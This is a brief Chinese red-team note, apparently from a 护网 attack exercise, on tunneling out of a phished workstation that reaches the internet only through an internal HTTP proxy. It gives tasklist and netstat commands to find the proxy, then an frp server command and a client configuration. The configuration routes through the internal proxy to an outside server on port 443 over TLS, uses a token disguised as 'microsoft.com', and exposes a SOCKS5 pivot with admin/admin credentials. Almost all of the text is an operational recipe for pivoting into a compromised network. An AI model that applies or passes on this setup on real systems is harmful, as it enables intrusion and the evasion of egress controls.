背景
场景:在xxx护网中通过钓鱼钓到了个人机器,但是可以通过HTTP到CS服务器上,通过ping 不到外网的服务器上,通过定位定位程序pid,发现该台主机通过访问代理服务器上网。这里需要在配置文件中配置对应的指向到代理服务器上网。
定位问题
tasklist |findstr [可以上网的程序]
查看对应程序的PID
netstat -ano |findstr [pid]
查看
服务端
frps -p [监听端口] -t [token]
#原版配置文件即可
客户端
客户端配置文件
[common]
server_addr = 1.1.1.1
server_port= 443
token =microsoft.com
tls_enable =true
delete = false
http_proxy = http://10.1.x.x:80 #指定对应代理服务器
[socks5]
type = tcp
remote_port =30000
plugin =socks5
plugin_user=admin
plugin_passwd=admin
use_compression = true
frpc -c frpc.ini
使用Proxifier 配置对应的地址,端口,账号密码即可。